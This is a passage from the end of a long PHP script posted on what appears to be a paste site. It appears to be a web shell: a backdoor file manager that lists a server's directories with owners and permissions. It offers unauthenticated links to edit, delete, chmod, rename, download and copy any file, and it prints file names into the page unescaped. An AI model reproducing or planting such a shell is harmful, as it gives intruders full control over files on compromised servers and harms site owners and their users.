  2070. $info=perm($perms);
  2071. if($i%2){$color="#D7FFA8";}else{$color="#D1D1D1";}
  2072. $linkd="<a href='$php_self?d=$d/$dirs[$i]'>$dirs[$i]</a>";
  2073. $linkd=str_replace("//","/",$linkd);
  2074. echo "<tr><td bgcolor=$color><font face=wingdings size=2>0</font> $linkd</td><td bgcolor=$color><center><font color=blue>DIR</font></td><td bgcolor=$color>&nbsp;</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
  2075. }
  2076.  
  2077. for($i=0; $i<count($files); $i++){
  2078.  
  2079. $size=@filesize($d."/".$files[$i]);
  2080. $perms = @fileperms($d."/".$files[$i]);
  2081. $owner = @fileowner($d."/".$files[$i]);
  2082. if($os=="unix"){
  2083. $fileownera=posix_getpwuid($owner);
  2084. $owner=$fileownera['name'];
  2085. }
  2086. $group = @filegroup($d."/".$files[$i]);
  2087. if($os=="unix"){
  2088. $groupinfo = posix_getgrgid($group);
  2089. $group=$groupinfo['name'];
  2090. }
  2091. $info=perm($perms);
  2092. if($i%2){$color="#D1D1D1";}else{$color="#D7FFA8";}
  2093.  
  2094. if ($size < 1024){$siz=$size.' b';
  2095. }else{
  2096. if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{
  2097. if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{
  2098. if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';}
  2099. }}}
  2100. echo "<tr><td bgcolor=$color><font face=wingdings size=3>2</font> <a href='$php_self?d=$d&e=$files[$i]'>$files[$i]</a></td><td bgcolor=$color><center><a href=\"javascript:ShowOrHide('$i','')\">[options]</a><div id='$i' style='display:none;z-index:1;' ><a href='$php_self?d=$d&ef=$files[$i]&edit=1' title='Edit $files[$i]'><b>Edit</b></a><br><a href='$php_self?d=$d&del_f=1&wich_f=$files[$i]' title='Delete $files[$i]'><b>Delete</b></a><br><a href='$php_self?d=$d&chmod=1&wich_f=$files[$i]' title='chmod $files[$i]'><b>CHMOD</b></a><br><a href='$php_self?d=$d&rename=1&wich_f=$files[$i]' title='Rename $files[$i]'><b>Rename</b></a><br><a href='$php_self?d=$d&download=$files[$i]' title='Download $files[$i]'><b>Download</b></a><br><a href='$php_self?d=$d&ccopy_to=$files[$i]' title='Copy $files[$i] to?'><b>Copy</b></a></div></td><td bgcolor=$color>$siz</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
  2101. }
  2102.  
  2103. echo "</table></td></tr></table>";
  2104. echo $copyr;
  2105.  
  2106. ?>
RAW Paste Data
Top